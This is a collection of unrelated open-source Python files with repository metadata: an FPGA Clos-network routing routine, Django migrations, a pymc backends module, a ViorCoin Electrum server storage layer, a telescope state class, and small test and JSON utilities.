if (((I+N) % k) != 0):
print "\n\n-------------- ERROR -----------------------"
print "In the current state, only values for I and N" + \
" are supported where I+N is dividable by k"
print "---------------------------------------------"
sys.exit(0)
#set the count of first stage crossbars
P = int(math.ceil( (N + I)/ k))
#first stage: r=P crossbars with k=m input pins
#this list describe the mapping, between the output pins of this stage
#and the interconnection block input pins.
#so we have P lists in this list with k outputs containing the
#input pin number
stage1 = [[-1 for j in range(k)] for i in range(P)]
#second stage: m=k crossbars with P=r input pins
stage2 = [[-1 for j in range(N)] for i in range(k)]
#tracks if the routing algo was sucessfully
success = 0
#a count to prevent infinite loops.
#break up the outer loop and ends the routing trial.
#TODO: implement a configurable globs.params variable for this supercount.
supercount = 0
while success is 0 and supercount < 180:
supercount = supercount +1
#just a change of the representation of the routing vector.
#make a list for every used pin of the clos network input,
#append the ble index for this pin.
# give the relation: input pin -> ble number
in_to_out = [[] for i in range(I+N)]
#len routing vector is N. the number of bles.
for bleIndex in range(len(routing_vector)):
#the source pin number.
#pin is referred to the clos network input pin number
for pin in routing_vector[bleIndex]:
#skip unrouted pins
if (pin != -1):
in_to_out[pin].append(bleIndex)
unrouted = []
#made a list 0,1,2,.. to I+N
#describe the input pin numbers in a sequence we try to route them
#start with the first number and end with the last.
#therefore we will shuffle this index list.
pins_to_route = [ i for i in range(len(in_to_out))]
#permute the list
random.shuffle(pins_to_route)
#a counter to prevent infinite loops
count = 0
#permute the target ble numbers of a pin
for pin in pins_to_route:
random.shuffle(in_to_out[pin])
while success is 0 and count < 80:
#a list of unrouted input pins.
#format : list of tuple (input pin number, target ble index)
unrouted = []
count = count + 1
#a list 0,1,2 ... to k=m
#describe the output pin numbers of a crossbar
nlist = [ i for i in range(k)]
random.shuffle(nlist)
#the last try to route was not successfull. maybe we try it in an other sequence
#therefore we shuffle the index list of pins we want try to route.
random.shuffle(pins_to_route)
#try to route the input pins step by step
for pin in pins_to_route :
#get the crossbar number of the first stage for this input pin
x1 = int(pin/k)
#get the targeted ble index numbers
for dest in in_to_out[pin]:
#index of the output pin of the first stage crossbar, used for the routing
#only set when the complete routing trough both stages was successful
s1 = -1
#index of the output pin of the second stage crossbar, used for the routing
s2 = -1
#try to find a free output pin of the first stage crossbar to route the track
for i in nlist:
#remember: x1 is the crossbar number of the first stage.
# i is the output pin of this crossbar
# pin is the input pin number
#dest is the targeted ble number
#output of the first stage crossbar is free or already used for that pin
if stage1[x1][i] is -1 or stage1[x1][i] is pin: #unused
#see if this will route to desired mux
#the output pin of the corresponding second stage crossbar is free
# or already used for this pin
if stage2[i][dest] is -1 or stage2[i][dest] is pin: #unused
#this two output pins of both crossbars are used for the
#given input pin. save this input pin number
stage1[x1][i] = pin
stage2[i][dest] = pin
#variable to track if this ble was not routable
s1 = i
s2 = dest
break
#there was no possible output pin in the first or second stage crossbar
#to route this input pin number
if s1 is -1:
#save this unrouted pin together with the dest ble index
unrouted.append((pin, dest))
pins_to_route = []
#all pin have been routed
if len(unrouted) is 0:
success = 1
#there are unrouted input pins
for pin, dest in unrouted:
#rip up other routed pins to make room
for iterations in range(1 + int(count/20)): #unroute more pins as we do more iterations
pin_to_unroute = -1
#select the first stage crossbar of the unrouted input pin
x1 = int(pin/k)
# build a list from [ 0,1 to k-1]
#the outputs indexes of the crossbar we want to throw out some tracks
nlist = [ i for i in range(k)]
random.shuffle(nlist)
#this branch paste -1 in the unroute list. beaks the algo
#if random.random() < 0.6:
# for i in nlist:
# #the stage 2 crossbars output pin to the dest ble is not used
# #so we have an input pin number we want to unroute
# if stage2[i][dest] is -1:
# pin_to_unroute = stage1[x1][i]
# break
#just take a random input pin to reroute. should be I+N
#if random.random() < 0.06:
# pin_to_unroute = random.choice(range(I+N))
pin_to_unroute = random.choice(range(I+N))
#there are still unrouted pins but no selection of pins to unroute
#take one random crossbar of the second stage
#and select the pin which leads to the dest ble
#can also break the algo through -1
#if pin_to_unroute < 0:
# pin_to_unroute = stage2[random.randint(0,k-1)][dest]
#we have selected an input pin to reroute but we must
#cancel the routings in the crossbars for this pin
for i in range(P):
for j in range(k):
if stage1[i][j] is pin_to_unroute:
stage1[i][j] = -1
for i in range(k):
for j in range(N):
if stage2[i][j] is pin_to_unroute:
stage2[i][j] = -1
#now we can append the unrouted pin in the route todo list
pins_to_route.append(pin_to_unroute)
#also append the still not routed pin
pins_to_route.append(pin)
if success is 0:
print "\n\n-------------- ERROR -----------------------"
print 'Routing Algo was not able to route the network'
print "---------------------------------------------"
sys.exit(0)
return [stage1, stage2]
|
adbrant/zuma-fpga
|
source/clos_routing.py
|
Python
|
bsd-2-clause
| 8,394
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-06-26 19:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pppcemr', '0139_auto_20160626_1511'),
]
operations = [
migrations.AddField(
model_name='encounter',
name='is_billed',
field=models.BooleanField(default=True),
),
]
|
sstebbins/pppcpro
|
pppcemr/migrations/0140_encounter_is_billed.py
|
Python
|
agpl-3.0
| 456
|
# Generated by Django 1.11.21 on 2019-08-27 09:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('waldur_vmware', '0020_guest_power_state'),
]
operations = [
migrations.AddField(
model_name='virtualmachine',
name='tools_state',
field=models.CharField(
blank=True,
choices=[
('STARTING', 'Starting'),
('RUNNING', 'Running'),
('NOT_RUNNING', 'Not running'),
],
max_length=50,
verbose_name='Current running status of VMware Tools running in the guest operating system.',
),
),
]
|
opennode/nodeconductor-assembly-waldur
|
src/waldur_vmware/migrations/0021_virtualmachine_tools_state.py
|
Python
|
mit
| 759
|
"""Backends for traces
Available backends
------------------
1. NumPy array (pymc.backends.NDArray)
2. Text files (pymc.backends.Text)
3. SQLite (pymc.backends.SQLite)
The NumPy arrays and text files both hold the entire trace in memory,
whereas SQLite commits the trace to the database while sampling.
Selecting a backend
-------------------
By default, a NumPy array is used as the backend. To specify a different
backend, pass a backend instance to `sample`.
For example, the following would save traces to the file 'test.db'.
>>> import pymc as pm
>>> db = pm.backends.SQLite('test.db')
>>> trace = pm.sample(..., trace=db)
Selecting values from a backend
-------------------------------
After a backend is finished sampling, it returns a MultiTrace object.
Values can be accessed in a few ways. The easiest way is to index the
backend object with a variable or variable name.
>>> trace['x'] # or trace[x]
The call will return a list containing the sampling values of `x` for
all chains. (For a single call to `sample`, the number of chains will
correspond to the `njobs` argument.)
For more control of which values are returned, the `get_values` method
can be used. The call below will return values from all chains, burning
the first 1000 iterations from each chain.
>>> trace.get_values('x', burn=1000)
Setting the `combined` flag will concatenate the results from all the
chains.
>>> trace.get_values('x', burn=1000, combine=True)
The `chains` parameter of `get_values` can be used to limit the chains
that are retrieved.
>>> trace.get_values('x', burn=1000, combine=True, chains=[0, 2])
Some backends also suppport slicing the MultiTrace object. For example,
the following call would return a new trace object without the first
1000 sampling iterations for all traces and variables.
>>> sliced_trace = trace[1000:]
Loading a saved backend
-----------------------
Saved backends can be loaded using `load` function in the module for the
specific backend.
>>> trace = pm.backends.sqlite.load('test.db')
Writing custom backends
-----------------------
Backends consist of a class that handles sampling storage and value
selection. Three sampling methods of backend will be called:
- setup: Before sampling is started, the `setup` method will be called
with two arguments: the number of draws and the chain number. This is
useful setting up any structure for storing the sampling values that
require the above information.
- record: Record the sampling results for the current draw. This method
will be called with a dictionary of values mapped to the variable
names. This is the only sampling function that *must* do something to
have a meaningful backend.
- close: This method is called following sampling and should perform any
actions necessary for finalizing and cleaning up the backend.
The base storage class `backends.base.BaseTrace` provides common model
setup that is used by all the PyMC backends.
Several selection methods must also be defined:
- get_values: This is the core method for selecting values from the
backend. It can be called directly and is used by __getitem__ when the
backend is indexed with a variable name or object.
- _slice: Defines how the backend returns a slice of itself. This
is called if the backend is indexed with a slice range.
- point: Returns values for each variable at a single iteration. This is
called if the backend is indexed with a single integer.
- __len__: This should return the number of draws (for the highest chain
number).
When `pymc.sample` finishes, it wraps all trace objects in a MultiTrace
object that provides a consistent selection interface for all backends.
If the traces are stored on disk, then a `load` function should also be
defined that returns a MultiTrace object.
For specific examples, see pymc.backends.{ndarray,text,sqlite}.py.
"""
from ..backends.ndarray import NDArray
from ..backends.text import Text
from ..backends.sqlite import SQLite
_shortcuts = {'text': {'backend': Text,
'name': 'mcmc'},
'sqlite': {'backend': SQLite,
'name': 'mcmc.sqlite'}}
|
nmmarquez/pymc
|
pymc3/backends/__init__.py
|
Python
|
apache-2.0
| 4,193
|
import plyvel
import ast
import hashlib
import os
import sys
from processor import print_log, logger
from utils import bc_address_to_hash_160, hash_160_to_pubkey_address, hex_to_int, int_to_hex, Hash
global GENESIS_HASH
GENESIS_HASH = '0000074a757ce334e850ff46a695b96d4dc44ccdd0f6860f5c34c49ef9005dcc'
"""
Patricia tree for hashing unspents
"""
DEBUG = 0
KEYLENGTH = 20 + 32 + 4 #56
class Storage(object):
def __init__(self, config, shared, test_reorgs):
self.dbpath = config.get('leveldb', 'path')
if not os.path.exists(self.dbpath):
os.mkdir(self.dbpath)
self.pruning_limit = config.getint('leveldb', 'pruning_limit')
self.shared = shared
self.hash_list = {}
self.parents = {}
self.test_reorgs = test_reorgs
try:
self.db_utxo = plyvel.DB(os.path.join(self.dbpath,'utxo'), create_if_missing=True, compression=None)
self.db_addr = plyvel.DB(os.path.join(self.dbpath,'addr'), create_if_missing=True, compression=None)
self.db_hist = plyvel.DB(os.path.join(self.dbpath,'hist'), create_if_missing=True, compression=None)
self.db_undo = plyvel.DB(os.path.join(self.dbpath,'undo'), create_if_missing=True, compression=None)
except:
logger.error('db init', exc_info=True)
self.shared.stop()
self.db_version = 3 # increase this when database needs to be updated
try:
self.last_hash, self.height, db_version = ast.literal_eval(self.db_undo.get('height'))
print_log("Database version", self.db_version)
print_log("Blockchain height", self.height)
except:
print_log('initializing database')
self.height = 0
self.last_hash = GENESIS_HASH
db_version = self.db_version
# write root
self.put_node('', {})
# check version
if self.db_version != db_version:
print_log("Your database '%s' is deprecated. Please create a new database"%self.dbpath)
self.shared.stop()
return
# compute root hash
d = self.get_node('')
self.root_hash, v = self.get_node_hash('',d,None)
print_log("UTXO tree root hash:", self.root_hash.encode('hex'))
print_log("Coins in database:", v)
# convert between bitcoin addresses and 20 bytes keys used for storage.
def address_to_key(self, addr):
return bc_address_to_hash_160(addr)
def key_to_address(self, addr):
return hash_160_to_pubkey_address(addr)
def get_proof(self, addr):
key = self.address_to_key(addr)
i = self.db_utxo.iterator(start=key)
k, _ = i.next()
p = self.get_path(k)
p.append(k)
out = []
for item in p:
v = self.db_utxo.get(item)
out.append((item.encode('hex'), v.encode('hex')))
return out
def get_balance(self, addr):
key = self.address_to_key(addr)
i = self.db_utxo.iterator(start=key)
k, _ = i.next()
if not k.startswith(key):
return 0
p = self.get_parent(k)
d = self.get_node(p)
letter = k[len(p)]
return d[letter][1]
def listunspent(self, addr):
key = self.address_to_key(addr)
if key is None:
raise BaseException('Invalid ViorCoin address', addr)
out = []
for k, v in self.db_utxo.iterator(start=key):
if not k.startswith(key):
break
if len(k) == KEYLENGTH:
txid = k[20:52].encode('hex')
txpos = hex_to_int(k[52:56])
h = hex_to_int(v[8:12])
v = hex_to_int(v[0:8])
out.append({'tx_hash': txid, 'tx_pos':txpos, 'height': h, 'value':v})
out.sort(key=lambda x:x['height'])
return out
def get_history(self, addr):
out = []
o = self.listunspent(addr)
for item in o:
out.append((item['tx_hash'], item['height']))
h = self.db_hist.get(addr)
while h:
item = h[0:80]
h = h[80:]
txi = item[0:32].encode('hex')
hi = hex_to_int(item[36:40])
txo = item[40:72].encode('hex')
ho = hex_to_int(item[76:80])
out.append((txi, hi))
out.append((txo, ho))
# sort
out.sort(key=lambda x:x[1])
# uniqueness
out = set(out)
return map(lambda x: {'tx_hash':x[0], 'height':x[1]}, out)
def get_address(self, txi):
return self.db_addr.get(txi)
def get_undo_info(self, height):
s = self.db_undo.get("undo_info_%d" % (height % 100))
if s is None: print_log("no undo info for ", height)
return eval(s)
def write_undo_info(self, height, bitcoind_height, undo_info):
if height > bitcoind_height - 100 or self.test_reorgs:
self.db_undo.put("undo_info_%d" % (height % 100), repr(undo_info))
def common_prefix(self, word1, word2):
max_len = min(len(word1),len(word2))
for i in range(max_len):
if word2[i] != word1[i]:
index = i
break
else:
index = max_len
return word1[0:index]
def put_node(self, key, d, batch=None):
k = 0
serialized = ''
for i in range(256):
if chr(i) in d.keys():
k += 1<<i
h, v = d[chr(i)]
if h is None: h = chr(0)*32
vv = int_to_hex(v, 8).decode('hex')
item = h + vv
assert len(item) == 40
serialized += item
k = "0x%0.64X" % k # 32 bytes
k = k[2:].decode('hex')
assert len(k) == 32
out = k + serialized
if batch:
batch.put(key, out)
else:
self.db_utxo.put(key, out)
def get_node(self, key):
s = self.db_utxo.get(key)
if s is None:
return
#print "get node", key.encode('hex'), len(key), s.encode('hex')
k = int(s[0:32].encode('hex'), 16)
s = s[32:]
d = {}
for i in range(256):
if k % 2 == 1:
_hash = s[0:32]
value = hex_to_int(s[32:40])
d[chr(i)] = (_hash, value)
s = s[40:]
k = k/2
#cache
return d
def add_address(self, target, value, height):
assert len(target) == KEYLENGTH
word = target
key = ''
path = [ '' ]
i = self.db_utxo.iterator()
while key != target:
items = self.get_node(key)
if word[0] in items.keys():
i.seek(key + word[0])
new_key, _ = i.next()
if target.startswith(new_key):
# add value to the child node
key = new_key
word = target[len(key):]
if key == target:
break
else:
assert key not in path
path.append(key)
else:
# prune current node and add new node
prefix = self.common_prefix(new_key, target)
index = len(prefix)
## get hash and value of new_key from parent (if it's a leaf)
if len(new_key) == KEYLENGTH:
parent_key = self.get_parent(new_key)
parent = self.get_node(parent_key)
z = parent[ new_key[len(parent_key)] ]
self.put_node(prefix, { target[index]:(None,0), new_key[index]:z } )
else:
# if it is not a leaf, update the hash of new_key because skip_string changed
h, v = self.get_node_hash(new_key, self.get_node(new_key), prefix)
self.put_node(prefix, { target[index]:(None,0), new_key[index]:(h,v) } )
path.append(prefix)
self.parents[new_key] = prefix
break
else:
assert key in path
items[ word[0] ] = (None,0)
self.put_node(key,items)
break
# write
s = (int_to_hex(value, 8) + int_to_hex(height,4)).decode('hex')
self.db_utxo.put(target, s)
# the hash of a node is the txid
_hash = target[20:52]
self.update_node_hash(target, path, _hash, value)
def update_node_hash(self, node, path, _hash, value):
c = node
for x in path[::-1]:
self.parents[c] = x
c = x
self.hash_list[node] = (_hash, value)
def update_hashes(self):
nodes = {} # nodes to write
for i in range(KEYLENGTH, -1, -1):
for node in self.hash_list.keys():
if len(node) != i: continue
node_hash, node_value = self.hash_list.pop(node)
# for each node, compute its hash, send it to the parent
if node == '':
self.root_hash = node_hash
self.root_value = node_value
break
parent = self.parents[node]
# read parent.. do this in add_address
d = nodes.get(parent)
if d is None:
d = self.get_node(parent)
assert d is not None
letter = node[len(parent)]
assert letter in d.keys()
if i != KEYLENGTH and node_hash is None:
d2 = self.get_node(node)
node_hash, node_value = self.get_node_hash(node, d2, parent)
assert node_hash is not None
# write new value
d[letter] = (node_hash, node_value)
nodes[parent] = d
# iterate
grandparent = self.parents[parent] if parent != '' else None
parent_hash, parent_value = self.get_node_hash(parent, d, grandparent)
self.hash_list[parent] = (parent_hash, parent_value)
# batch write modified nodes
batch = self.db_utxo.write_batch()
for k, v in nodes.items():
self.put_node(k, v, batch)
batch.write()
# cleanup
assert self.hash_list == {}
self.parents = {}
def get_node_hash(self, x, d, parent):
# final hash
if x != '':
skip_string = x[len(parent)+1:]
else:
skip_string = ''
d2 = sorted(d.items())
values = map(lambda x: x[1][1], d2)
hashes = map(lambda x: x[1][0], d2)
value = sum( values )
_hash = self.hash( skip_string + ''.join(hashes) )
return _hash, value
def get_path(self, target):
word = target
key = ''
path = [ '' ]
i = self.db_utxo.iterator(start='')
while key != target:
i.seek(key + word[0])
try:
new_key, _ = i.next()
is_child = new_key.startswith(key + word[0])
except StopIteration:
is_child = False
if is_child:
if target.startswith(new_key):
# add value to the child node
key = new_key
word = target[len(key):]
if key == target:
break
else:
assert key not in path
path.append(key)
else:
print_log('not in tree', self.db_utxo.get(key+word[0]), new_key.encode('hex'))
return False
else:
assert key in path
break
return path
def delete_address(self, leaf):
path = self.get_path(leaf)
if path is False:
print_log("addr not in tree", leaf.encode('hex'), self.key_to_address(leaf[0:20]), self.db_utxo.get(leaf))
raise
s = self.db_utxo.get(leaf)
self.db_utxo.delete(leaf)
if leaf in self.hash_list:
self.hash_list.pop(leaf)
parent = path[-1]
letter = leaf[len(parent)]
items = self.get_node(parent)
items.pop(letter)
# remove key if it has a single child
if len(items) == 1:
letter, v = items.items()[0]
self.db_utxo.delete(parent)
if parent in self.hash_list:
self.hash_list.pop(parent)
# we need the exact length for the iteration
i = self.db_utxo.iterator()
i.seek(parent+letter)
k, v = i.next()
# note: k is not necessarily a leaf
if len(k) == KEYLENGTH:
_hash, value = k[20:52], hex_to_int(v[0:8])
else:
_hash, value = None, None
self.update_node_hash(k, path[:-1], _hash, value)
else:
self.put_node(parent, items)
_hash, value = None, None
self.update_node_hash(parent, path[:-1], _hash, value)
return s
def get_children(self, x):
i = self.db_utxo.iterator()
l = 0
while l <256:
i.seek(x+chr(l))
k, v = i.next()
if k.startswith(x+chr(l)):
yield k, v
l += 1
elif k.startswith(x):
yield k, v
l = ord(k[len(x)]) + 1
else:
break
def get_parent(self, x):
""" return parent and skip string"""
i = self.db_utxo.iterator()
for j in range(len(x)):
p = x[0:-j-1]
i.seek(p)
k, v = i.next()
if x.startswith(k) and x!=k:
break
else: raise
return k
def hash(self, x):
if DEBUG: return "hash("+x+")"
return Hash(x)
def get_root_hash(self):
return self.root_hash
def close(self):
self.db_utxo.close()
self.db_addr.close()
self.db_hist.close()
self.db_undo.close()
def add_to_history(self, addr, tx_hash, tx_pos, value, tx_height):
key = self.address_to_key(addr)
txo = (tx_hash + int_to_hex(tx_pos, 4)).decode('hex')
# write the new history
self.add_address(key + txo, value, tx_height)
# backlink
self.db_addr.put(txo, addr)
def revert_add_to_history(self, addr, tx_hash, tx_pos, value, tx_height):
key = self.address_to_key(addr)
txo = (tx_hash + int_to_hex(tx_pos, 4)).decode('hex')
# delete
self.delete_address(key + txo)
# backlink
self.db_addr.delete(txo)
def get_utxo_value(self, addr, txi):
key = self.address_to_key(addr)
leaf = key + txi
s = self.db_utxo.get(leaf)
value = hex_to_int(s[0:8])
return value
def set_spent(self, addr, txi, txid, index, height, undo):
key = self.address_to_key(addr)
leaf = key + txi
s = self.delete_address(leaf)
value = hex_to_int(s[0:8])
in_height = hex_to_int(s[8:12])
undo[leaf] = value, in_height
# delete backlink txi-> addr
self.db_addr.delete(txi)
# add to history
s = self.db_hist.get(addr)
if s is None: s = ''
txo = (txid + int_to_hex(index,4) + int_to_hex(height,4)).decode('hex')
s += txi + int_to_hex(in_height,4).decode('hex') + txo
s = s[ -80*self.pruning_limit:]
self.db_hist.put(addr, s)
def revert_set_spent(self, addr, txi, undo):
key = self.address_to_key(addr)
leaf = key + txi
# restore backlink
self.db_addr.put(txi, addr)
v, height = undo.pop(leaf)
self.add_address(leaf, v, height)
# revert add to history
s = self.db_hist.get(addr)
# s might be empty if pruning limit was reached
if not s:
return
assert s[-80:-44] == txi
s = s[:-80]
self.db_hist.put(addr, s)
def import_transaction(self, txid, tx, block_height, touched_addr):
undo = { 'prev_addr':[] } # contains the list of pruned items for each address in the tx; also, 'prev_addr' is a list of prev addresses
prev_addr = []
for i, x in enumerate(tx.get('inputs')):
txi = (x.get('prevout_hash') + int_to_hex(x.get('prevout_n'), 4)).decode('hex')
addr = self.get_address(txi)
if addr is not None:
self.set_spent(addr, txi, txid, i, block_height, undo)
touched_addr.add(addr)
prev_addr.append(addr)
undo['prev_addr'] = prev_addr
# here I add only the outputs to history; maybe I want to add inputs too (that's in the other loop)
for x in tx.get('outputs'):
addr = x.get('address')
if addr is None: continue
self.add_to_history(addr, txid, x.get('index'), x.get('value'), block_height)
touched_addr.add(addr)
return undo
def revert_transaction(self, txid, tx, block_height, touched_addr, undo):
#print_log("revert tx", txid)
for x in reversed(tx.get('outputs')):
addr = x.get('address')
if addr is None: continue
self.revert_add_to_history(addr, txid, x.get('index'), x.get('value'), block_height)
touched_addr.add(addr)
prev_addr = undo.pop('prev_addr')
for i, x in reversed(list(enumerate(tx.get('inputs')))):
addr = prev_addr[i]
if addr is not None:
txi = (x.get('prevout_hash') + int_to_hex(x.get('prevout_n'), 4)).decode('hex')
self.revert_set_spent(addr, txi, undo)
touched_addr.add(addr)
assert undo == {}
|
ROIV/ViorCoin-ElectrumServer
|
src/storage.py
|
Python
|
agpl-3.0
| 18,187
|
"""@package panoptes.state.states.sleeping
The sleeping state happens during the day, after components have been
connected, while we are waiting for darkness.
From the sleeping state you can go to parking and getting ready. Moving to
parking state should be triggered by bad weather. Moving to getting ready
state should be triggered by timing. At a user configured time (i.e. at
the end of twilight), the system will go to getting ready.
In sleeping state:
- it is: day
- camera connected: yes
- camera cooling: no
- camera cooled: N/A
- camera exposing: no
- mount connected: yes
- mount tracking: no
- mount slewing: no
- mount parked: yes
- weather: N/A
- target chosen: N/A
- test image taken: N/A
- target completed: N/A
- analysis attempted: N/A
- analysis in progress: N/A
- astrometry solved: N/A
- levels determined: N/A
Timeout Condition: This state does not have a formal timeout, but should
check to see if it is night as this state should not happen during night.
"""
from panoptes.state import state
class Sleeping(state.PanoptesState):
def setup(self, *args, **kwargs):
self.outcomes = ['ready']
def run(self):
try:
self.logger.info("Turning on camera cooler.")
# self.camera.set_cooling(True)
self.outcome = 'ready'
except:
self.logger.critical("Camera not responding to set cooling. Parking.")
self.logger.info("Conditions are now dark, moving to getting ready state.")
return self.outcome
|
Guokr1991/POCS
|
panoptes/state/states/sleeping.py
|
Python
|
mit
| 1,617
|
"""Tests for the JuiceNet component."""
|
nkgilley/home-assistant
|
tests/components/juicenet/__init__.py
|
Python
|
apache-2.0
| 40
|
# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from . import caffe_train
from digits import test_utils
def test_caffe_imports():
test_utils.skipIfNotFramework('caffe')
import numpy
import google.protobuf
|
TimZaman/DIGITS
|
digits/model/tasks/test_caffe_train.py
|
Python
|
bsd-3-clause
| 281
|
import os
import json
import numpy
from chainer import cuda
class JSONEncoderEX(json.JSONEncoder):
"""Ref: https://stackoverflow.com/questions/27050108/convert-numpy-type-to-python"""
def default(self, obj):
if isinstance(obj, numpy.integer):
return int(obj)
elif isinstance(obj, numpy.floating):
return float(obj)
elif isinstance(obj, numpy.ndarray):
return obj.tolist()
elif isinstance(obj, cuda.ndarray):
return cuda.to_cpu(obj).tolist()
else:
return super(JSONEncoderEX, self).default(obj)
def save_json(filepath, params, ignore_error=True):
"""save params in json format.
Args:
filepath (str): filepath to save args
params (dict or list): args to be saved
ignore_error (bool): if True, it will ignore exception with printing
error logs, which prevents to stop
"""
try:
with open(filepath, 'w') as f:
json.dump(params, f, indent=4, cls=JSONEncoderEX)
except Exception as e:
if not ignore_error:
raise e
else:
print('[WARNING] Error occurred at save_json, but ignoring...')
print('The file {} may not be saved.'.format(filepath))
print(e)
def load_json(filepath):
"""load params, whicch is stored in json format.
Args:
filepath (str): filepath to save args
Returns (dict or list): params
"""
with open(filepath, 'r') as f:
params = json.load(f)
return params
if __name__ == '__main__':
import chainerex.utils as cl
# Demo
# Please remove 'result' directory, which contains 'args' file, after demo.
args = {
'a_int': 1,
'b_str': 'string',
'c_list': [1, 2, 3],
'd_tuple': (1, 2),
'n_int_scalar': numpy.array(1),
'n_int_array': numpy.array([1]),
'n_float': numpy.array([[1.0, 2.0], [3.0, 4.0]]),
}
out_dir = cl.create_timedir()
filepath = os.path.join(out_dir, 'args')
cl.save_json(filepath, args)
# # Add additional information, it also work.
# args.update({'e': 'ext_info'})
# cl.save_json(os.path.join(out_dir, 'args'), args)
load_args = load_json(filepath)
print(type(load_args), load_args)
|
corochann/chainerex
|
chainerex/utils/log.py
|
Python
|
mit
| 2,306
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.